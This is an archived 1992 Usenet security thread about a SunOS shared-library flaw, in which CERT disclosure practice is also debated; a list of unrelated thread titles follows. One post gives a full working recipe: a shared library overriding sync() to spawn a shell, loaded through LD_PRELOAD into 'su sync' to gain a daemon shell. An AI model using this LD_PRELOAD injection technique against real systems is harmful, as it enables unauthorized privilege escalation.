that sun env var thing -- it's the old LD_LIBRARY_PATH thing right?

that sun env var thing -- it's the old LD_LIBRARY_PATH thing right?

Post by Rob J. Nau » Sat, 30 May 1992 19:33:50




Quote:

>Again the cert advisory fails to inform as much as it could... that sun
>environment variable thing.. it's just ld.so with relative path names in -L
>options right, the one we've known about in alt.security for a year or two?  Or
>has something worse been discovered?

Not the relative pathnames, but alternative paths/libraries with the
LD_LIBRARY_PATH or LD_PRELOAD variables (the last one is undocumented).

Make a file 'sync.c'
  sync() {
        execl("/bin/sh","sh",0);
  }

then type:
  brasaap% cc -c -O -R -pic sync.c
  brasaap% ld -o buglib.so.1.1 -assert pure-text sync.o
  brasaap% setenv LD_PRELOAD ./buglib.so.1.1
  brasaap% su sync
  $ id
uid=1(daemon) gid=1(daemon) groups=1

Instead of 'su sync' you can also use 'login -p sync'.
FIX: change /etc/passwd to:
  sync::65533:65533::/:/bin/sync

SUN has fixed this not by fixing ld.so, but by fixing a few UNIX commands
that are setuid and exec normal programma's (su, login, sendmail).
Other setuid programs that exec normal programs should beware of this,
and either setuid back before exec(), or clear LD_LIBRARY_PATH and
LD_PRELOAD before exec().

Quote:>thanks for any info,
>ajr

I don't know what took them so long, I knew this last year, the owner
of this machine complained about this in january or february to sun.
It's a shame that it seems now it's not permitted to discuss any UNIX
bugs as soon as they have an impact on security. CERT is more like a
black hole nowadays, with all our mail and news going in, and only
crappy vendor advisories and general textfiles that don't go beyond
'check your hosts.equiv for a "+"'.

Rob
--

                    /~~~~~~~~~~~~~~~~~~~~~~~~~~\                A/~~\A
                    | - From the keyboard of - |               ((o  o))___    
                    |      Rob J. Nauta        |                 \  /     ~~~

----#---x---x---x---|   Phone: +31-40-833777   |--#---x---x---x---x---x---#---
    #               \--------------------------/  #                    \  #  
----#---x---x---x---x--| |--#---x---x---x-| |--x--#---x---x---x---x---x---#---
    #)( \\|  /*\/|((   | | )#(//  \\)(/  \| |(// \#(//  \|/   \\)|(/   \|)#(/

 
 
 

that sun env var thing -- it's the old LD_LIBRARY_PATH thing right?

Post by Wietse Vene » Sun, 31 May 1992 03:51:11



Quote:>I don't know what took them so long, I knew this last year, the owner
>of this machine complained about this in january or february to sun.
>It's a shame that it seems now it's not permitted to discuss any UNIX
>bugs as soon as they have an impact on security. CERT is more like a
>black hole nowadays, with all our mail and news going in, and only
>crappy vendor advisories and general textfiles that don't go beyond
>'check your hosts.equiv for a "+"'.

I (the owner of "this" machine) disagree. Openly discussing security
holes before a fix is available only helps the intruders. Both CERT and
Sun worked very * this problem and on other problems I reported
in the past.  The LD_ problem was particularly difficult because there
is no general fix, except statically linking every executable.

I also take exception to the statement that CERT is a black hole.  It
is not CERT's job to fix holes.  Whenever a fix becomes available, CERT
has to decide how much information can be given away without bringing
systems at risk. CERT certainly doesn't have to hand out recipes for
how to exploit holes.

Followups to comp.security.misc. Alt.security is on its way out.

 
 
 

1. 'w' & 'who' doesnt display the right thing!

Hi Folks,

I got a very _strange_ Problem with the Output of 'w' and 'who'!
Normally if i open a Terminal under X, its will be shown in the
Output of these Programs... same under 'sshd' normal logins..
FAILURE!

Their DOESNT display me currently logged in users.. only 'local'
on my console.

I tried to recompile 'w', 'who' and 'login' ... but no changes.

Any Ideas??

OpenBSD 3.3

Thx, Jens

2. scsi CD-R's under rh6.0?

3. Please Help....it′s a very small thing!!!!.PLEASE

4. kernel_thread

5. /dev/null doesn't do the right thing with select??

6. Using shadow password option for POP mail

7. This Xandros thing ain't right, I tells ya.

8. At the end of my LILO rope

9. That stupid windoze thing again (was That stupid prayer at school thing again...)

10. Referencing an env var from an env var

11. Bad things, man...bad things...

12. KDE, Setting Env Vars, LD_LIBRARY_PATH?, .xinitrc - help

13. Q: env. variables & other things